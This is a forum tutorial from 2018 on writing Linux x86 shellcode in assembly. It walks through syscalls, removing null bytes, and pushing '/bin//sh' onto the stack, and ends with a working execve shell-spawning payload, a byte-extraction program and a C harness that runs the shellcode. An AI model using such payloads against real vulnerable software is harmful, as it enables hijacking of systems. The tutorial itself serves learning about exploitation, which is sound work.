Linux Shellcoding
Submitted by Officer Marles, 03-01-2018, 09:09 PM, Thread ID: 68193
Requirements
Alright, so this isn't going to be an msfvenom tutorial (shellcodes are payloads).
This tutorial will focus on writing shellcode in assembly.
Knowledge of C and assembly is highly recommended. Knowing how the stack works is also a big plus.
Memory Segments
When a program is run, it is loaded into RAM. Programs normally use 5 segments:
Code:
The stack segment (function calls and local variables, dynamic).
The heap segment (dynamically allocated memory).
The data segment (initialized global and static variables).
The bss segment (uninitialized global and static variables).
The text segment (the set of instructions, i.e. the actual code).
With assembly you have total control over these segments.
In shellcoding, however, we will only be using the text and the stack segments.
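As a rough illustration of the five segments, here is a small C sketch that records one sample address from each. The struct segment_addrs and the function sample_addresses are made-up names for this example, and which segment a variable ends up in is ultimately decided by the compiler and linker.

```c
#include <stdint.h>
#include <stdlib.h>

int initialized_global = 42;   /* lives in the data segment */
int uninitialized_global;      /* lives in the bss segment (zeroed at start) */

struct segment_addrs {
    uintptr_t text, data, bss, heap, stack;
};

/* Hypothetical helper: records one sample address from each segment. */
struct segment_addrs sample_addresses(void)
{
    int local = 0;                           /* lives on the stack */
    int *dynamic = malloc(sizeof *dynamic);  /* lives on the heap */
    struct segment_addrs a;

    a.text  = (uintptr_t)&sample_addresses;  /* the code itself */
    a.data  = (uintptr_t)&initialized_global;
    a.bss   = (uintptr_t)&uninitialized_global;
    a.heap  = (uintptr_t)dynamic;
    a.stack = (uintptr_t)&local;
    free(dynamic);
    return a;
}
```

Printing the five values with printf("%p") from a main() shows how far apart the segments sit in the address space.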
Assembly primer
So first we need to know some assembly.
The registers
We will be focusing on a couple of registers:
Code:
The EAX register
The EBX register
The ECX register
The EDX register
The ESP register
These registers are like little pieces of memory inside the CPU.
They have nothing to do with RAM, though, as they are part of the CPU itself.
The CPU uses these registers to do calculations and perform simple operations.
In assembly we address these registers directly; they can be thought of as variables.
Assembly instructions
There are some instructions that are important in assembly programming:
Code:
MOV (assign, for example MOV EAX, 32 (EAX = 32)).
XOR (Exclusive OR, for example XOR EAX, EAX)
PUSH (Push something on the stack, example: PUSH EAX).
POP (Load what was on the stack in a register/variable, example: POP EBX).
CALL (Call a function, for example: CALL FuncPrint).
INT (Interrupt, for example INT 0x80, which is used to make syscalls on 32-bit Linux).
Be sure that you understand these concepts.
You can of course try to learn what they mean from this tutorial,
but it's better to take your time and learn them from a more in-depth source.
Syscalls
What is important in shellcoding is making use of syscalls.
Syscalls are functions provided by the kernel. This means that if your shellcode makes a syscall,
you don't have to include headers or declare anything.
Here: http://syscalls.kernelgrok.com/170 you can find an overview of all Linux x86 syscalls; look up syscall 11 (0xB), execve.
A syscall takes arguments like a normal function; however, with INT 0x80 the arguments are passed in registers and not on the stack.
You can think of the registers like argv[] in C:
argv[0], the 'first' argument (your program name in C), would be the EAX register.
This is where you load the syscall number; for execve this is 11, or 0xB in hex.
argv[1] is the first real argument and would be the EBX register, for example the string "/bin/bash".
Note that a string in C is handled through a pointer, for example char *s = "Hello World".
The variable 's' is a pointer and NOT the actual string; it's the memory address where the string is stored.
s could be something like 0x4000b401. At 0x4000b401 you'd then find the first character, which for "/bin/bash" is '/' or 0x2f in hex.
The string is read from there until the null byte 0x00. The actual string would never fit in a 32-bit register.
The next argument is ECX. For execve this is argv: a pointer to a NULL-terminated array of string pointers holding the arguments for the program that gets called (so not a single string). Linux also accepts 0 (NULL) here.
execve takes one more argument in EDX: envp, the environment for the new program, which has the same shape as argv.
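To see the "syscall number plus arguments" idea from C, here is a minimal sketch that uses the glibc syscall() wrapper, which loads the number and the arguments into the right registers for you. The helper names raw_getpid and raw_write are made up for this example; SYS_getpid and SYS_write come from <sys/syscall.h>.

```c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/syscall.h>

/* Hypothetical helper: getpid() made "by hand" through syscall().
 * Only the syscall number is needed, there are no arguments. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}

/* Hypothetical helper: write(fd, buf, len) through syscall().
 * The number goes first, the three arguments follow in order. */
long raw_write(int fd, const char *buf, unsigned long len)
{
    return syscall(SYS_write, fd, buf, len);
}
```

Calling raw_write(1, "hi\n", 3) prints to stdout without going through printf or the write() wrapper. In shellcode there is no libc to lean on, so you load the registers yourself and issue INT 0x80.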
A too simple shellcode
A shellcode is in many ways similar to a normal program, except that it runs inside the virtual address space of the program you are exploiting (so not its own).
The name shellcode is kind of misleading. It implies that shellcodes are used to spawn shells, but nowadays there are many other uses for shellcode,
like running chmod 777 on a certain program, or downloading and executing a file. Nevertheless, 'shellcode' was the name that stuck.
Today we will be writing a simple shellcode that spawns a shell.
First, though, we will write a normal assembly program. You will need nasm installed on your machine to assemble it.
Code:
sudo apt-get install nasm
So here is the assembly program:
Code:
section .data
    msg db '/bin/sh', 0  ; db stands for define byte; msg is the address of a NUL-terminated string

section .text
    global _start        ; entry point for the linker, comparable to int main()

_start:
    mov eax, 11          ; eax = 11 (execve); read it as mov destination, source
    mov ebx, msg         ; load the string pointer into ebx
    mov ecx, 0           ; no arguments in ecx
    int 0x80             ; syscall
    mov eax, 1           ; exit syscall
    mov ebx, 0           ; exit status 0 (no errors)
    int 0x80             ; syscall
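Copy and paste it into an editor and save it as shell.asm.
To assemble and link it, use the following commands (-m elf_i386 is needed when linking on a 64-bit system):
Code:
nasm -f elf -o shell.o shell.asm
Code:
ld -m elf_i386 -o shell shell.o
Now run it with:
Code:
./shell
Awesome, a shell. This is what we wanted! Easy, right?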
Now let's try to extract the shellcode.
To do so, use the command:
Code:
objdump -M intel -d shell
This will result in:
(The disassembly listing of _start is missing from this copy of the post.)
Let's look at the 2nd line in _start: instead of msg, it says 0x80490a0. This is the memory address of the string msg.
This is a problem, though. Remember that I said a shellcode doesn't use its own virtual address space, but that of the exploited program?
This means that the address 0x80490a0 probably contains either garbage or nothing,
since the .data segment of our assembly program isn't part of the shellcode.
The shellcode would be:
Code:
"\xb8\x0b\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\x00\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
Now we face another problem: null bytes.
Eliminating nullbytes
Code:
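#include <stdio.h>

int main(void)
{
    printf("Hello\x00 World!");
    return 0;
}
Compile and run.
Result:
Code:
Hello
So what happened here? If you've programmed in C you may know the problem: strings use \x00 as their terminator.
In a buffer overflow, the shellcode (which is a string) is usually copied onto the stack by a string function such as strcpy, which stops at the first null byte.
Therefore a null byte cuts off the chain of instructions.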
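To make the truncation concrete, here is a small C sketch that copies a payload the way a vulnerable program might and reports how much of it arrived. The function name bytes_copied_by_strcpy and the 64-byte buffer are assumptions made for this example.

```c
#include <string.h>

/* Hypothetical helper: copies a payload with strcpy and reports how
 * many bytes actually arrived. Assumes the part of the payload before
 * its first 0x00 byte is shorter than the buffer. */
size_t bytes_copied_by_strcpy(const char *payload)
{
    char buffer[64] = {0};

    strcpy(buffer, payload);   /* stops at the first 0x00 byte */
    return strlen(buffer);
}
```

Passing the start of our first shellcode, "\xb8\x0b\x00\x00\x00\xbb\xa0\x90\x04\x08", returns 2: only b8 0b survives the copy, and everything after the first null byte is lost.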
So now let's look at our program once again.
XOR
As mentioned earlier, XOR is an assembly instruction.
XOR is like OR, with one major difference.
Let's look at two tables.
Code:
OR:
1 OR 1 = 1
1 OR 0 = 1
0 OR 1 = 1
0 OR 0 = 0
Code:
XOR:
1 XOR 1 = 0
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
So how is this relevant? Well, remember that you can't use null bytes.
So if you want to put 0 in a register, doing MOV EAX, 0 would put null bytes in the shellcode.
Let's say the EAX register looks like this:
...0010001101
XOR'ing EAX with itself XORs each bit with itself.
Each bit is either 1 or 0:
Code:
1 XOR 1 = 0.
0 XOR 0 = 0.
Therefore every bit gets set to 0.
Doing so has the same result as MOV EAX, 0, but without the use of null bytes.
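The difference shows up directly in the machine code. The sketch below holds the 32-bit x86 encodings of both instructions as byte arrays and scans them for 0x00; has_null_byte is a made-up helper name for this example.

```c
#include <stddef.h>

/* Machine code for the two ways of zeroing EAX on 32-bit x86. */
static const unsigned char mov_eax_0[]   = { 0xb8, 0x00, 0x00, 0x00, 0x00 }; /* mov eax, 0   */
static const unsigned char xor_eax_eax[] = { 0x31, 0xc0 };                   /* xor eax, eax */

/* Hypothetical helper: returns 1 if the code contains a 0x00 byte. */
int has_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return 1;
    return 0;
}
```

has_null_byte(mov_eax_0, sizeof mov_eax_0) returns 1, while has_null_byte(xor_eax_eax, sizeof xor_eax_eax) returns 0. The XOR form is also three bytes shorter.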
Now let's look at the objdump output once again.
Notice that the operation MOV EAX, 0xb still produces null bytes.
The reason for this is that EAX is a 32-bit register, so the value is encoded as a full 4-byte immediate.
You can read the line b8 0b 00 00 00 as:
b8 (MOV into EAX) followed by 0b 00 00 00, the value 11 stored in little-endian byte order (least significant byte first). That is EAX = 0x0000000b, or MOV EAX, 0xb.
Addressing Lower Halves of Registers
If you're already familiar with assembly, you might've read that EAX's lower half can also be used in instructions.
This lower half is called AX and is 2 bytes (16 bits) in size.
AX can also be split: the higher half is called AH and the lower half is called AL.
Think of it like this:
Code:
[---16bits---|--AH-8bits-|--AL-8bits-]
[---16bits---|-------16bits-AX-------]
[-----------32bits---EAX-------------]
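So in order to assign 11 to EAX, we have to combine the things we discussed.
First we need to make sure EAX doesn't contain garbage values, because writing to AL leaves the upper 24 bits untouched.
To do so we zero EAX out with the XOR instruction.
XOR EAX, EAX
Now we can assign 11 to the lowest byte of EAX.
MOV AL, 0xb (11)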
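The relationship between EAX, AX, AH and AL can be modelled in C with masks and shifts. This is only a model of the register layout, and the function names mov_al, get_ax, get_ah and get_al are made up for this example.

```c
#include <stdint.h>

/* Hypothetical model of MOV AL, value: only the lowest 8 bits change,
 * the upper 24 bits of EAX keep whatever they held before. */
uint32_t mov_al(uint32_t eax, uint8_t value)
{
    return (eax & 0xFFFFFF00u) | value;
}

/* AX is the low 16 bits of EAX, AH the high byte of AX, AL the low byte. */
uint16_t get_ax(uint32_t eax) { return (uint16_t)(eax & 0xFFFFu); }
uint8_t  get_ah(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xFFu); }
uint8_t  get_al(uint32_t eax) { return (uint8_t)(eax & 0xFFu); }
```

mov_al(0xdeadbeef, 0x0b) gives 0xdeadbe0b, which is not syscall number 11, while mov_al(0, 0x0b) gives exactly 11. That is why the XOR has to come first.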
Using the Stack to Store Variables
So we already have the first argument for our syscall ready.
Now we need to assign a string pointer to EBX, but before we do that, we need something to point to, that is, the actual character array:
Code:
|'/'|'b'|'i'|'n'|'/'|'s'|'h'|\x00|
The only dynamic memory we can use for this is the stack.
Note that each ASCII character has a corresponding hex value; a table can be found here: http://www.asciitable.com/21
From left to right the hex codes are:
0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x00.
What we can do is push these on the stack. Then we can use the stack pointer ESP as a string pointer.
Because the stack is LIFO (last in, first out) and grows downwards, we have to push the values in reverse order.
To push values on the stack you can use the instruction PUSH:
PUSH <value>. Be aware that each PUSH here puts exactly 4 bytes on the stack.
Now a problem arises. You can't push "/sh\x00" on the stack, as the null byte would terminate the shellcode.
To get around this, we have to go back a few steps and look at our first two lines:
Code:
XOR EAX, EAX
MOV AL, 0xb
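Notice that after XOR EAX, EAX, EAX will have the value 0.
In shellcoding it is often wise to use this to our advantage for as long as possible. Because we now have a 0 we can use, we will postpone the MOV AL, 0xb instruction.
So instead of pushing 0x0068732f ("\x00hs/" when read from the highest byte down) on the stack, we split it in two parts: the terminating 0x00 and the bytes of "/sh" (0x68732f).
Now instead of doing PUSH 0x00, we do PUSH EAX.
It has the same result (four zero bytes on the stack), but we avoided a null byte in the code.
Next we can do:
Code:
PUSH 0x68732f2f (added a / here to fill all 4 bytes and avoid a null byte)
PUSH 0x6e69622f
Now the stack pointer will point to the string "/bin//sh". The doubled slash is harmless, as the kernel treats "//" in a path like "/".
So this will be our 2nd argument (EBX).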
Code:
MOV EBX, ESP
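To check that the pushes really leave "/bin//sh" in memory, the stack can be simulated in C. This is a sketch with a made-up 64-byte stack; push32 and build_path are hypothetical names, and the byte order is written out by hand so the result does not depend on the machine running it.

```c
#include <stdint.h>
#include <string.h>

#define STACK_SIZE 64

static unsigned char stack_mem[STACK_SIZE];
static size_t esp = STACK_SIZE;   /* the stack starts empty, at the top */

/* Hypothetical model of PUSH on 32-bit x86: move ESP down by 4 and
 * store the value least significant byte first (little-endian). */
void push32(uint32_t value)
{
    esp -= 4;
    for (int i = 0; i < 4; i++)
        stack_mem[esp + i] = (unsigned char)(value >> (8 * i));
}

/* Replays the three pushes and returns what ESP then points at. */
const char *build_path(void)
{
    esp = STACK_SIZE;
    push32(0x00000000);   /* PUSH EAX with EAX = 0: the terminator */
    push32(0x68732f2f);   /* "//sh" */
    push32(0x6e69622f);   /* "/bin" */
    return (const char *)&stack_mem[esp];
}
```

build_path() returns a pointer to the 8 characters "/bin//sh" followed by the zero bytes from the first push, which is exactly what MOV EBX, ESP hands to execve.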
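The third argument (ECX) for our execve syscall is the argument list for /bin/sh. Of course we don't want this to contain garbage, because then execve would fail or sh would be started with invalid arguments. Therefore we need ECX to be 0.
Once again we can use our EAX register, which still holds 0.
Code:
MOV ECX, EAX
Finally we assign the syscall number to EAX:
Code:
MOV AL, 0xb
And do the syscall:
Code:
INT 0x80
This leaves us with the following code:
Code: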
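section .text
    global _start

_start:
    xor eax, eax        ; eax = 0 without null bytes in the code
    push eax            ; 4 zero bytes: the string terminator
    push 0x68732f2f     ; "//sh"
    push 0x6e69622f     ; "/bin"
    mov ebx, esp        ; ebx -> "/bin//sh"
    mov ecx, eax        ; argv = NULL
    mov edx, eax        ; envp = NULL; execve also reads edx, so clear it as well
    mov al, 0xb         ; syscall number 11 (execve)
    int 0x80            ; syscall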
Extracting the Shellcode
Now let's assemble and link it:
Code:
nasm -f elf -o shell.o shell.asm
Code:
ld -m elf_i386 -o shell shell.o
Now to get the shellcode I wrote this C program:
Code:
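#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
    int in_run = 1;     /* 1 while the previous byte was non-zero */
    unsigned char buf;
    int fd;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    fd = open(argv[1], O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    /* read() returns 1 per byte, 0 at end of file, -1 on error */
    while (read(fd, &buf, 1) == 1) {
        if (buf == 0 && in_run) {
            printf(" \n");          /* first null byte ends the current line */
            in_run = 0;
        } else if (buf) {
            printf("\\x%02x", buf); /* print the byte as a C hex escape */
            in_run = 1;
        }
    }
    close(fd);
    return 0;
}
It skips runs of null bytes and prints each continuous run of non-zero bytes as its own line of hex escapes.
Run it with the shell binary as its argument; one of these lines is your shellcode.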
To check if your shellcode works you can use this simple C program:
Code:
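/* Build as a 32-bit program. On current systems the memory holding the
 * string is usually not executable by default, so the call may crash. */
int main(void)
{
    const char *shellcode = "<the shellcode>";

    ((void (*)(void))shellcode)();   /* jump to the first byte of the shellcode */
    return 0;
}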
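If the simple tester crashes because the string sits in non-executable memory, one common workaround is to copy the bytes into a page you map yourself and then mark that page executable. Here is a minimal sketch of that idea; make_executable_copy is a made-up helper name, and some hardened systems may still refuse the mprotect call.

```c
#define _DEFAULT_SOURCE
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: copies code into a fresh anonymous mapping and
 * then switches that mapping to read + execute.
 * Returns NULL on failure. */
void *make_executable_copy(const unsigned char *code, size_t len)
{
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return NULL;
    memcpy(page, code, len);
    if (mprotect(page, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, len);
        return NULL;
    }
    return page;
}
```

In a 32-bit build you would then cast the returned pointer to void (*)(void) and call it, the same way the simple tester does with its string.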
That was all for today, hope you enjoyed it!